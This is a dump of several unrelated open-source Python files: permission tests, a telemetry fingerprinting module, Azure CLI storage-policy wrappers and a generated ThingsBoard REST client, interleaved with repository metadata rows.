rights_manager.publish_collection(self.user_id_a, self.COLLECTION_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_unpublish(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
rights_manager.unpublish_collection(
self.user_id_admin, self.COLLECTION_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_can_only_delete_unpublished_collections(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
rights_manager.publish_collection(self.user_id_a, self.COLLECTION_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
rights_manager.unpublish_collection(
self.user_id_admin, self.COLLECTION_ID)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
def test_can_publicize_collection(self):
self.save_new_default_collection(self.COLLECTION_ID, self.user_id_a)
rights_manager.publish_collection(self.user_id_a, self.COLLECTION_ID)
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_publicize(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_publicize(
rights_manager.ACTIVITY_TYPE_COLLECTION, self.COLLECTION_ID))

# File: src/HABApp/openhab/__init__.py (repo: pailloM/HABApp, license: Apache-2.0)
# no external dependencies
import HABApp.openhab.errors
import HABApp.openhab.events
import HABApp.openhab.interface_async
import HABApp.openhab.interface
# items use the interface for the convenience functions
import HABApp.openhab.items
| 24.1 | 55 | 0.846473 | 32 | 241 | 6.34375 | 0.5 | 0.295567 | 0.46798 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103734 | 241 | 9 | 56 | 26.777778 | 0.939815 | 0.323651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
91dfe9d6055df8af2dabc94ba3361e34395655d2 | 13,060 | py | Python | analytics_engine/data_analytics/fingerprint.py | svoorakk/analytics_engine | f5636be9682a8b56bdc1f55f80235b5bf4c155b7 | [
"Apache-2.0"
] | null | null | null | analytics_engine/data_analytics/fingerprint.py | svoorakk/analytics_engine | f5636be9682a8b56bdc1f55f80235b5bf4c155b7 | [
"Apache-2.0"
] | 9 | 2018-05-23T07:11:17.000Z | 2019-12-10T08:42:10.000Z | analytics_engine/data_analytics/fingerprint.py | svoorakk/analytics_engine | f5636be9682a8b56bdc1f55f80235b5bf4c155b7 | [
"Apache-2.0"
] | 5 | 2018-09-14T12:13:30.000Z | 2021-07-17T00:20:17.000Z | # Copyright (c) 2017, Intel Research and Development Ireland Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__authors__ = 'Giuliana Carullo, Vincenzo Riccobene'
__copyright__ = "Copyright (c) 2017, Intel Research and Development Ireland Ltd."
__license__ = "Apache 2.0"
__maintainer__ = "Giuliana Carullo"
__email__ = "giuliana.carullo@intel.com"
__status__ = "Development"
from analytics_engine.heuristics.beans.infograph import InfoGraphNode, InfoGraphNodeType, \
InfoGraphNodeCategory, InfoGraphNodeLayer
import pandas
import math
class Fingerprint(object):
# Deprecated
@staticmethod
def _node_is_nic_on_management_net(node, graph, mng_net_name):
node_name = InfoGraphNode.get_name(node)
node_type = InfoGraphNode.get_type(node)
if node_type == InfoGraphNodeType.VIRTUAL_NIC or \
node_type == InfoGraphNodeType.VIRTUAL_NIC_2:
neighs = graph.neighbors(node_name)
for n in neighs:
neighbor = InfoGraphNode.\
get_node(graph, n)
if InfoGraphNode.get_type(neighbor) == \
InfoGraphNodeType.VIRTUAL_NETWORK:
network_name = \
InfoGraphNode.get_attributes(
neighbor)['name']
if network_name == mng_net_name:
return True
return False
@staticmethod
def workload_capacity_usage(annotated_subgraph):
"""
This is a type of fingerprint
"""
# TODO: Validate graph
categories = list()
categories.append(InfoGraphNodeCategory.COMPUTE)
categories.append(InfoGraphNodeCategory.NETWORK)
# TODO: Add a Volume to the workloads to get HD usage
categories.append(InfoGraphNodeCategory.STORAGE)
# TODO: Get telemetry for Memory
categories.append(InfoGraphNodeCategory.MEMORY)
fingerprint = dict()
counter = dict()
for category in categories:
fingerprint[category] = 0
counter[category] = 0
# calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
local_subgraph.filter_nodes('layer', "physical")
local_subgraph.filter_nodes('layer', "service")
for node in local_subgraph.nodes(data=True):
# if Fingerprint._node_is_nic_on_management_net(
# node, annotated_subgraph, mng_net_name):
# continue
category = InfoGraphNode.get_category(node)
utilization = InfoGraphNode.get_utilization(node)
if 'utilization' in utilization.columns.values:
mean = utilization['utilization'].mean()
fingerprint[category] += mean
counter[category] += 1
# This is just an average
# TODO: Improve the average
for category in categories:
if counter[category] > 0:
fingerprint[category] = \
fingerprint[category] / counter[category]
return fingerprint
@staticmethod
def machine_capacity_usage(annotated_subgraph):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
categories = list()
categories.append(InfoGraphNodeCategory.COMPUTE)
categories.append(InfoGraphNodeCategory.NETWORK)
# TODO: Add a Volume to the workloads to get HD usage
categories.append(InfoGraphNodeCategory.STORAGE)
# TODO: Get telemetry for Memory
categories.append(InfoGraphNodeCategory.MEMORY)
fingerprint = dict()
counter = dict()
for category in categories:
fingerprint[category] = 0
counter[category] = 0
# calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
local_subgraph.filter_nodes('layer', "virtual")
local_subgraph.filter_nodes('layer', "service")
local_subgraph.filter_nodes('type', 'machine')
for node in local_subgraph.nodes(data=True):
# if Fingerprint._node_is_nic_on_management_net(
# node, annotated_subgraph, mng_net_name):
# continue
name = InfoGraphNode.get_name(node)
category = InfoGraphNode.get_category(node)
utilization = InfoGraphNode.get_utilization(node)
if 'utilization' in utilization.columns.values:
# LOG.info("NODE: {} - CATEGORY: {}".format(name, category))
mean = utilization['utilization'].mean()
fingerprint[category] += mean
counter[category] += 1
# This is just an average
# TODO: Improve the average
for category in categories:
if counter[category] > 0:
fingerprint[category] = \
fingerprint[category] / counter[category]
return fingerprint
@staticmethod
def compute_node(annotated_subgraph, hostname=None):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
data = dict()
statistics = dict()
compute = InfoGraphNodeCategory.COMPUTE
data[compute] = pandas.DataFrame()
statistics[compute] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
network = InfoGraphNodeCategory.NETWORK
data[network] = pandas.DataFrame()
statistics[network] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
storage = InfoGraphNodeCategory.STORAGE
data[storage] = pandas.DataFrame()
statistics[storage] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
memory = InfoGraphNodeCategory.MEMORY
data[memory] = pandas.DataFrame()
statistics[memory] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
# Calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
for node in local_subgraph.nodes(data=True):
layer = InfoGraphNode.get_layer(node)
is_machine = InfoGraphNode.node_is_machine(node)
if is_machine:
continue
if layer == InfoGraphNodeLayer.VIRTUAL:
continue
if layer == InfoGraphNodeLayer.SERVICE:
continue
# If hostname has been specified, need to take into account only
# nodes that are related to the specific host
attrs = InfoGraphNode.get_attributes(node)
allocation = attrs['allocation'] if 'allocation' in attrs \
else None
if hostname and not hostname == allocation:
continue
category = InfoGraphNode.get_category(node)
utilization = InfoGraphNode.get_utilization(node)
try:
utilization = utilization.drop('timestamp', 1)
except ValueError:
utilization = InfoGraphNode.get_utilization(node)
data[category] = pandas.concat([data[category], utilization])
for category in statistics:
if not data[category].empty:
mean = data[category]['utilization'].mean()
median = (data[category]['utilization']).median()
min = data[category]['utilization'].min()
maximum = data[category]['utilization'].max()
var = data[category]['utilization'].var()
std_dev = math.sqrt(var)
else:
mean = 0
median = 0
min = 0
maximum = 0
var = 0
std_dev = 0
statistics[category] = \
{'mean': mean,
'median': median,
'min': min,
'max': maximum,
'var': var,
'std_dev': std_dev}
return [data, statistics]
@staticmethod
def compute_node_resources(annotated_subgraph, hostname=None):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
data = dict()
statistics = dict()
# Calculation of the fingerprint on top of the virtual resources
local_subgraph = annotated_subgraph.copy()
for node in local_subgraph.nodes(data=True):
layer = InfoGraphNode.get_layer(node)
if layer == InfoGraphNodeLayer.VIRTUAL:
continue
if layer == InfoGraphNodeLayer.SERVICE:
continue
type = InfoGraphNode.get_type(node)
if type == 'core':
continue
# If hostname has been specified, need to take into account only
# nodes that are related to the specific host
attrs = InfoGraphNode.get_attributes(node)
allocation = attrs['allocation'] if 'allocation' in attrs \
else None
if hostname and not hostname == allocation:
continue
name = InfoGraphNode.get_name(node)
statistics[name] = {'mean': 0,
'median': 0,
'min': 0,
'max': 0,
'var': 0,
'std_dev': 0}
utilization = InfoGraphNode.get_utilization(node)
try:
utilization = utilization.drop('timestamp', 1)
except ValueError:
utilization = InfoGraphNode.get_utilization(node)
data[name] = utilization
if not data[name].empty:
mean = data[name]['utilization'].mean()
median = (data[name]['utilization']).median()
min = data[name]['utilization'].min()
maximum = data[name]['utilization'].max()
var = data[name]['utilization'].var()
std_dev = math.sqrt(var)
else:
mean = 0
median = 0
min = 0
maximum = 0
var = 0
std_dev = 0
statistics[name] = \
{'mean': mean,
'median': median,
'min': min,
'max': maximum,
'var': var,
'std_dev': std_dev}
return [data, statistics]
@staticmethod
def workload(nodes):
"""
This is a type of fingerprint from the infrastructure perspective
"""
# TODO: Validate graph
data = dict()
statistics = dict()
compute = InfoGraphNodeCategory.COMPUTE
data[compute] = pandas.DataFrame()
statistics[compute] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
network = InfoGraphNodeCategory.NETWORK
data[network] = pandas.DataFrame()
statistics[network] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
storage = InfoGraphNodeCategory.STORAGE
data[storage] = pandas.DataFrame()
statistics[storage] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
memory = InfoGraphNodeCategory.MEMORY
data[memory] = pandas.DataFrame()
statistics[memory] = {'mean': 0, 'median': 0, 'min': 0, 'max': 0, 'var': 0, 'std_dev': 0}
# Calculation of the fingerprint on top of the virtual resources
for node in nodes:
layer = InfoGraphNode.get_layer(node)
is_machine = InfoGraphNode.node_is_machine(node)
if is_machine:
continue
if layer == InfoGraphNodeLayer.PHYSICAL:
continue
if layer == InfoGraphNodeLayer.SERVICE:
                continue
            # Accumulate utilization samples per category (mirrors
            # compute_node); without this the statistics below would
            # always operate on empty frames.
            category = InfoGraphNode.get_category(node)
            utilization = InfoGraphNode.get_utilization(node)
            try:
                utilization = utilization.drop('timestamp', 1)
            except ValueError:
                utilization = InfoGraphNode.get_utilization(node)
            data[category] = pandas.concat([data[category], utilization])
        for category in statistics:
            mean = (data[category]['utilization'].mean()
                    if not data[category].empty else 0)
median = 0
min = 0
maximum = 0
var = 0
std_dev = 0
statistics[category] = \
{'mean': mean,
'median': median,
'min': min,
'max': maximum,
'var': var,
'std_dev': std_dev}
        return [data, statistics]
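The fingerprint methods in this file all reduce per-category `utilization` samples to the same summary-statistics dict. A self-contained sketch of that reduction on synthetic data (category names and values are made up; this is not tied to `InfoGraphNode`):

```python
import math

import pandas

# Synthetic utilization samples per category (values are invented).
data = {
    "compute": pandas.DataFrame({"utilization": [10.0, 20.0, 30.0]}),
    "network": pandas.DataFrame(),  # empty, like an unused category
}

statistics = {}
for category, frame in data.items():
    if not frame.empty:
        util = frame["utilization"]
        var = util.var()  # pandas default: sample variance (ddof=1)
        statistics[category] = {
            "mean": util.mean(), "median": util.median(),
            "min": util.min(), "max": util.max(),
            "var": var, "std_dev": math.sqrt(var),
        }
    else:
        # Empty categories fall back to all-zero statistics.
        statistics[category] = {
            "mean": 0, "median": 0, "min": 0,
            "max": 0, "var": 0, "std_dev": 0,
        }

print(statistics["compute"]["mean"])  # 20.0
```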

# File: runTests.py (repo: HardwareDesignWithPython/HDPython, license: MIT)
import HDPython.tests
from HDPython.tests.helpers import remove_old_files
import HDPython.test_handler as test_handler
remove_old_files()
test_handler.run_all_tests()

# File: pyaz/storage/share/policy/__init__.py (repo: py-az-cli/py-az-cli, license: MIT)
'''
Manage shared access policies of a storage file share.
'''
from .... pyaz_utils import _call_az
def create(name, share_name, account_key=None, account_name=None, connection_string=None, expiry=None, permissions=None, sas_token=None, start=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- expiry -- expiration UTC datetime in (Y-m-d'T'H:M:S'Z')
- permissions -- Allowed values: (d)elete (l)ist (r)ead (w)rite (d)elete (l)ist (r)ead (w)rite. Can be combined
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- start -- start UTC datetime (Y-m-d'T'H:M:S'Z'). Defaults to time of request.
'''
return _call_az("az storage share policy create", locals())
def delete(name, share_name, account_key=None, account_name=None, connection_string=None, sas_token=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage share policy delete", locals())
def show(name, share_name, account_key=None, account_name=None, connection_string=None, sas_token=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage share policy show", locals())
def list(share_name, account_key=None, account_name=None, connection_string=None, sas_token=None):
'''
Required Parameters:
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage share policy list", locals())
def update(name, share_name, account_key=None, account_name=None, connection_string=None, expiry=None, permissions=None, sas_token=None, start=None):
'''
Required Parameters:
- name -- The stored access policy name.
- share_name -- The file share name.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either a storage account key or a SAS token. If neither is present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed, the API quota may be hit.
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- expiry -- Expiration UTC datetime in (Y-m-d'T'H:M:S'Z') format
- permissions -- Allowed values: (d)elete (l)ist (r)ead (w)rite. Can be combined
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- start -- start UTC datetime (Y-m-d'T'H:M:S'Z'). Defaults to time of request.
'''
return _call_az("az storage share policy update", locals())
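Each wrapper above forwards `locals()` to a `_call_az` helper that is not shown in this excerpt. Below is a rough sketch of how such a helper could translate the captured arguments into CLI flags — assuming snake_case parameter names map to `--kebab-case` options and `None` values (unset optional parameters) are skipped; the real `_call_az` may differ:

```python
import shlex

def build_az_command(command, params):
    """Turn a dict captured via locals() into an az CLI invocation string.

    snake_case parameter names become --kebab-case flags; None values
    (optional parameters that were not supplied) are omitted entirely.
    """
    parts = [command]
    for name, value in params.items():
        if value is None:
            continue
        flag = "--" + name.replace("_", "-")
        parts.append("%s %s" % (flag, shlex.quote(str(value))))
    return " ".join(parts)

# Mirror what show(name, share_name, ...) would capture via locals():
cmd = build_az_command(
    "az storage share policy show",
    {"name": "mypolicy", "share_name": "myshare", "account_key": None},
)
```

This also explains why the wrappers call `locals()` as the very first expression: at function entry it captures exactly the declared parameters and nothing else.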
from .barcodes import calc_cross_barcodes
from .barcodes import mtopdiv
from .barcodes import get_score
# coding: utf-8
"""
ThingsBoard REST API
ThingsBoard Professional Edition IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3PAAS-RC1
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class WidgetTypeControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_widget_type_using_delete(self, widget_type_id, **kwargs): # noqa: E501
"""Delete widget type (deleteWidgetType) # noqa: E501
Deletes the Widget Type. Referencing non-existing Widget Type Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_widget_type_using_delete(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_widget_type_using_delete_with_http_info(widget_type_id, **kwargs) # noqa: E501
else:
(data) = self.delete_widget_type_using_delete_with_http_info(widget_type_id, **kwargs) # noqa: E501
return data
def delete_widget_type_using_delete_with_http_info(self, widget_type_id, **kwargs): # noqa: E501
"""Delete widget type (deleteWidgetType) # noqa: E501
Deletes the Widget Type. Referencing non-existing Widget Type Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_widget_type_using_delete_with_http_info(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['widget_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_widget_type_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'widget_type_id' is set
if ('widget_type_id' not in params or
params['widget_type_id'] is None):
raise ValueError("Missing the required parameter `widget_type_id` when calling `delete_widget_type_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'widget_type_id' in params:
path_params['widgetTypeId'] = params['widget_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType/{widgetTypeId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_bundle_widget_types_details_using_get(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get all Widget types details for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type Details objects that belong to the specified Widget Bundle. Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_details_using_get(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeDetails]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_bundle_widget_types_details_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
else:
(data) = self.get_bundle_widget_types_details_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
return data
def get_bundle_widget_types_details_using_get_with_http_info(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get all Widget types details for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type Details objects that belong to the specified Widget Bundle. Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_details_using_get_with_http_info(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeDetails]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bundle_widget_types_details_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_bundle_widget_types_details_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_bundle_widget_types_details_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetTypesDetails{?bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WidgetTypeDetails]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_bundle_widget_types_infos_using_get(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get Widget Type Info objects (getBundleWidgetTypesInfos) # noqa: E501
Get the Widget Type Info objects based on the provided parameters. Widget Type Info is a lightweight object that represents a Widget Type but does not contain the heavyweight widget descriptor JSON. Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_infos_using_get(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeInfo]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_bundle_widget_types_infos_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
else:
(data) = self.get_bundle_widget_types_infos_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
return data
def get_bundle_widget_types_infos_using_get_with_http_info(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get Widget Type Info objects (getBundleWidgetTypesInfos) # noqa: E501
Get the Widget Type Info objects based on the provided parameters. Widget Type Info is a lightweight object that represents a Widget Type but does not contain the heavyweight widget descriptor JSON. Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_infos_using_get_with_http_info(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetTypeInfo]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bundle_widget_types_infos_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_bundle_widget_types_infos_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_bundle_widget_types_infos_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetTypesInfos{?bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WidgetTypeInfo]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_bundle_widget_types_using_get(self, is_system, bundle_alias, **kwargs): # noqa: E501
